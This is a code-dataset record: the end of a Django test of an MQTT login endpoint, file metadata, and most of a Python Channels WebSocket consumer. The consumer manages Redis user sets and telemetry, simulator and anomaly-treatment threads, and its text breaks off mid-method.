response = self.client.get('/en/auth/logout/', follow=True)
self.assertEqual(response.status_code, 200)
self.client.logout()
# mqtt login with correct temporary password
response = self.client.post('/en/auth/mqtt/login/',
{'username': username,
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 200)
# mqtt login with incorrect username
response = self.client.post('/en/auth/mqtt/login/',
{'username': username + 'o',
'password': encoded},
follow=True)
self.assertEqual(response.status_code, 403)
# mqtt login with incorrect encoded password
response = self.client.post('/en/auth/mqtt/login/',
{'username': username,
'password': encoded + 'r'},
follow=True)
self.assertEqual(response.status_code, 403)
| 43.298054
| 122
| 0.465539
| 2,911
| 35,591
| 5.626245
| 0.060804
| 0.088839
| 0.130602
| 0.131884
| 0.901697
| 0.88686
| 0.879656
| 0.876908
| 0.847478
| 0.831909
| 0
| 0.019491
| 0.419067
| 35,591
| 821
| 123
| 43.350792
| 0.772635
| 0.058638
| 0
| 0.804836
| 0
| 0
| 0.156297
| 0.036709
| 0
| 0
| 0
| 0.001218
| 0.17962
| 1
| 0.013817
| false
| 0.063903
| 0.018998
| 0
| 0.046632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
40594a785b412ae96d1974eac0bd502d6d1da9c8
| 339,966
|
py
|
Python
|
AT/consumers.py
|
seakers/daphne-brain
|
1d703d468cd503a21395f986dd72e67b6e556451
|
[
"MIT"
] | null | null | null |
AT/consumers.py
|
seakers/daphne-brain
|
1d703d468cd503a21395f986dd72e67b6e556451
|
[
"MIT"
] | null | null | null |
AT/consumers.py
|
seakers/daphne-brain
|
1d703d468cd503a21395f986dd72e67b6e556451
|
[
"MIT"
] | null | null | null |
import json
import redis
import schedule
import threading
import AT.global_objects as global_obj
from queue import Queue
from auth_API.helpers import get_user_information, get_or_create_user_information
from daphne_ws.consumers import DaphneConsumer
from AT.global_objects import frontend_to_hub_queue, userChannelNames, userChannelLayers
from asgiref.sync import async_to_sync
from AT.automated_at_routines.hub_routine import hub_routine
from AT.automated_at_routines.at_routine import anomaly_treatment_routine
from AT.simulator_thread.simulator_routine_by_false_eclss import simulate_by_dummy_eclss
from AT.simulator_thread.simulator_routine_by_real_eclss import handle_eclss_update
class ATConsumer(DaphneConsumer):
scheduler = schedule.Scheduler()
sched_stopper = None
kill_event = None
daphne_version = "AT"
##### WebSocket event handlers
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.queue = Queue()
def connect(self):
# First call function from base class, and then add the new behavior
super(ATConsumer, self).connect()
# Keep track of everyone that is on
r = redis.Redis()
r.sadd("all-users", self.channel_name)
if r.sismember("all-users", self.channel_name) == 1:
print(f"{self.channel_name} was successfully added to the all users group. The all users group contains "
f"{r.smembers('all-users')}")
else:
print(f"{self.channel_name} was not successfully added to the all users group.")
""" In the event daphne at needs to have all variables and queues cleared and threads killed
# Kill all the threads if they are running so that a stop message doesn't get left in the queue
if global_obj.sEclss_thread is not None:
if global_obj.sEclss_thread.is_alive():
global_obj.hub_to_sEclss_queue.put({'type': 'stop'})
if global_obj.sEclss_at_thread is not None:
if global_obj.sEclss_at_thread.is_alive():
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
if global_obj.simulator_threads[0] is not None:
if global_obj.simulator_threads[0].is_alive():
global_obj.hub_to_simulator_queues[0].put({'type': 'stop'})
if global_obj.simulator_at_threads[0] is not None:
if global_obj.simulator_at_threads[0].is_alive():
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
if global_obj.simulator_threads[1] is not None:
if global_obj.simulator_threads[1].is_alive():
global_obj.hub_to_simulator_queues[1].put({'type': 'stop'})
if global_obj.simulator_at_threads[1] is not None:
if global_obj.simulator_at_threads[1].is_alive():
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
if global_obj.simulator_threads[2] is not None:
if global_obj.simulator_threads[2].is_alive():
global_obj.hub_to_simulator_queues[2].put({'type': 'stop'})
if global_obj.simulator_at_threads[2] is not None:
if global_obj.simulator_at_threads[2].is_alive():
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
if global_obj.simulator_threads[3] is not None:
if global_obj.simulator_threads[3].is_alive():
global_obj.hub_to_simulator_queues[3].put({'type': 'stop'})
if global_obj.simulator_at_threads[3] is not None:
if global_obj.simulator_at_threads[3].is_alive():
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
# Clear all redis variables if no one is on
r.delete("seclss-group-users")
r.delete("fake-telemetry-one")
r.delete("fake-telemetry-two")
r.delete("fake-telemetry-three")
r.delete("fake-telemetry-four")
r.delete("all-users")
print("Cleared on redis variables.")
# Clear the queues and print a stop message, queues between hub and other threads get cleared in their threads
# But ensure all get cleared anyway to ensure everything starts on a clean slate
global_obj.frontend_to_hub_queue.queue.clear()
global_obj.sEclss_to_hub_queue.queue.clear()
global_obj.simulator_to_hub_queues[0].queue.clear()
global_obj.simulator_to_hub_queues[1].queue.clear()
global_obj.simulator_to_hub_queues[2].queue.clear()
global_obj.simulator_to_hub_queues[3].queue.clear()
global_obj.hub_to_sEclss_queue.queue.clear()
global_obj.hub_to_simulator_queues[0].queue.clear()
global_obj.hub_to_simulator_queues[1].queue.clear()
global_obj.hub_to_simulator_queues[2].queue.clear()
global_obj.hub_to_simulator_queues[3].queue.clear()
global_obj.hub_to_sEclss_at_queue.queue.clear()
global_obj.hub_to_simulator_at_queues[0].queue.clear()
global_obj.hub_to_simulator_at_queues[1].queue.clear()
global_obj.hub_to_simulator_at_queues[2].queue.clear()
global_obj.hub_to_simulator_at_queues[3].queue.clear()
global_obj.sEclss_at_to_hub_queue.queue.clear()
global_obj.simulator_at_to_hub_queues[0].queue.clear()
global_obj.simulator_at_to_hub_queues[1].queue.clear()
global_obj.simulator_at_to_hub_queues[2].queue.clear()
global_obj.simulator_at_to_hub_queues[3].queue.clear()
print("Cleared all queues.")"""
# Reset ping timer
signal = {'type': 'ws_configuration_update', 'content': None}
frontend_to_hub_queue.put(signal)
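    # Standalone sketch (an addition, separate from ATConsumer): the Redis-set
    # presence pattern used in connect()/disconnect() above — add the channel name
    # on connect, remove it on disconnect, and signal the shared worker to stop
    # once the last listener has left. Group and function names are placeholders.
    #
    #     import redis
    #
    #     def track_connect(r: redis.Redis, group: str, channel_name: str) -> None:
    #         # Record that this channel is now listening to `group`.
    #         r.sadd(group, channel_name)
    #
    #     def track_disconnect(r: redis.Redis, group: str, channel_name: str) -> bool:
    #         # Remove the channel and report whether it was the last listener; the
    #         # caller would then enqueue a {'type': 'stop'} for the worker thread.
    #         r.srem(group, channel_name)
    #         return r.scard(group) == 0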
def disconnect(self, close_code):
r = redis.Redis()
# remove user from real telemetry group if they were in it
if r.sismember('seclss-group-users', self.channel_name) == 1:
# Check if both telemetry and at thread are not initialized
if global_obj.sEclss_thread is None and global_obj.sEclss_at_thread is None:
r.srem('seclss-group-users', self.channel_name)
async_to_sync(self.channel_layer.group_discard)("sEclss_group", self.channel_name)
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if only telemetry thread is not initialized
elif global_obj.sEclss_thread is None:
# Check if at thread is alive, then kill that thread
if global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.sEclss_at_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_at_thread.is_alive():
print('There was an error stopping real at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
            # Check if only the at thread is not initialized
elif global_obj.sEclss_at_thread is None:
# Check if telemetry thread is alive, then kill that thread
if global_obj.sEclss_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.sEclss_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_thread.is_alive():
print('There was an error stopping real telemetry thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if both have been initialized
else:
# Check if both are alive then kill both
if global_obj.sEclss_thread.is_alive() and global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
# If no more users are listening to the real telemetry then stop it
if r.scard("seclss-group-users") == 0:
global_obj.frontend_to_hub_queue.put({'type': 'stop_real_telemetry'})
# Ensure that the thread stops
global_obj.sEclss_thread.join(2.0)
if global_obj.sEclss_thread.is_alive():
print('There was an error stopping the real telemetry thread.')
global_obj.sEclss_at_thread.join(2.0)
if global_obj.sEclss_at_thread.is_alive():
print('There was an error stopping the real at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if only sEclss thread is alive
elif global_obj.sEclss_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.sEclss_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_thread.is_alive():
print('There was an error stopping real telemetry thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if only at thread is alive
elif global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.sEclss_at_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_at_thread.is_alive():
print('There was an error stopping real at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
# Check if both are not running
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the seclss group users.")
print(f"{r.scard('seclss-group-users')}")
elif r.sismember('hera-group-users', self.channel_name) == 1:
# Check if both telemetry and at thread are not initialized
if global_obj.hera_thread is None and global_obj.hera_at_thread is None:
r.srem('hera-group-users', self.channel_name)
async_to_sync(self.channel_layer.group_discard)("hera_group", self.channel_name)
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if only telemetry thread is not initialized
elif global_obj.hera_thread is None:
# Check if at thread is alive, then kill that thread
if global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.hera_at_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_at_thread.is_alive():
print('There was an error stopping hera at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if only at thread is not initialized
elif global_obj.hera_at_thread is None:
# Check if telemetry thread is alive, then kill that thread
if global_obj.hera_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.hera_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_thread.is_alive():
print('There was an error stopping hera telemetry thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if both have been initialized
else:
# Check if both are alive then kill both
if global_obj.hera_thread.is_alive() and global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
# If no more users are listening to the hera telemetry then stop it
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_queue.put({'type': 'stop'})
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
# Ensure that the thread stops
global_obj.hera_thread.join(2.0)
if global_obj.hera_thread.is_alive():
print('There was an error stopping the hera telemetry thread.')
global_obj.hera_at_thread.join(2.0)
if global_obj.hera_at_thread.is_alive():
print('There was an error stopping the hera at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if only hera telemetry thread is alive
elif global_obj.hera_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.hera_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_thread.is_alive():
print('There was an error stopping hera telemetry thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if only at thread is alive
elif global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
global_obj.hera_at_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_at_thread.is_alive():
print('There was an error stopping hera at thread.')
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# Check if both are not running
else:
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
print(f"{self.channel_name} removed from the hera group users.")
print(f"{r.scard('hera-group-users')}")
# remove the user from the fake telemetry group if they were in one
elif r.sismember('fake-telemetry-one', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[0] is None and global_obj.simulator_at_threads[0] is None:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[0] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[0].is_alive():
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[0].is_alive():
print('There was an error stopping fake at thread one.')
# Unassign anyway
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[0] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[0].is_alive():
global_obj.hub_to_simulator_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[0].is_alive():
print('There was an error stopping fake simulator thread one.')
# unassign anyway
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[0].is_alive() and global_obj.simulator_at_threads[0].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_one'})
# Ensure it gets stopped
global_obj.simulator_threads[0].join(2.0)
if global_obj.simulator_threads[0].is_alive():
print('There was an error stopping fake telemetry thread one.')
global_obj.simulator_at_threads[0].join(2.0)
if global_obj.simulator_at_threads[0].is_alive():
print('There was an error stopping fake at thread one.')
# Unassign anyway
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[0].is_alive():
global_obj.hub_to_simulator_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[0].is_alive():
print('There was an error stopping fake simulator thread one.')
# Unassign anyway
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[0].is_alive():
global_obj.hub_to_simulator_at_queues[0].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[0].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[0].is_alive():
print('There was an error stopping fake at thread one.')
# Unassign anyway
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
# Check if both are dead then unassign
else:
r.srem('fake-telemetry-one', self.channel_name)
if r.scard("fake-telemetry-one") != 0:
r.delete("fake-telemetry-one")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_one'})
elif r.sismember('fake-telemetry-two', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[1] is None and global_obj.simulator_at_threads[1] is None:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[1] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[1].is_alive():
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[1].is_alive():
print('There was an error stopping fake at thread two.')
# Unassign anyway
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[1] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[1].is_alive():
global_obj.hub_to_simulator_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[1].is_alive():
print('There was an error stopping fake simulator thread two.')
# unassign anyway
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[1].is_alive() and global_obj.simulator_at_threads[1].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_two'})
# Ensure it gets stopped
global_obj.simulator_threads[1].join(2.0)
if global_obj.simulator_threads[1].is_alive():
print('There was an error stopping fake telemetry thread two.')
global_obj.simulator_at_threads[1].join(2.0)
if global_obj.simulator_at_threads[1].is_alive():
print('There was an error stopping fake at thread two.')
# Unassign anyway
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[1].is_alive():
global_obj.hub_to_simulator_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[1].is_alive():
print('There was an error stopping fake simulator thread two.')
# Unassign anyway
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[1].is_alive():
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[1].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[1].is_alive():
print('There was an error stopping fake at thread two.')
# Unassign anyway
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
# Check if both are dead then unassign
else:
r.srem('fake-telemetry-two', self.channel_name)
if r.scard("fake-telemetry-two") != 0:
r.delete("fake-telemetry-two")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_two'})
elif r.sismember('fake-telemetry-three', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[2] is None and global_obj.simulator_at_threads[2] is None:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[2] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[2].is_alive():
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_at_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[2].is_alive():
print('There was an error stopping fake at thread three.')
# Unassign anyway
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[2] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[2].is_alive():
global_obj.hub_to_simulator_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
global_obj.simulator_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[2].is_alive():
print('There was an error stopping fake simulator thread three.')
# unassign anyway
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# If it is not alive then it is already stopped
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[2].is_alive() and global_obj.simulator_at_threads[2].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_three'})
# Ensure it gets stopped
global_obj.simulator_threads[2].join(2.0)
if global_obj.simulator_threads[2].is_alive():
print('There was an error stopping fake telemetry thread three.')
global_obj.simulator_at_threads[2].join(2.0)
if global_obj.simulator_at_threads[2].is_alive():
print('There was an error stopping fake at thread three.')
# Unassign anyway
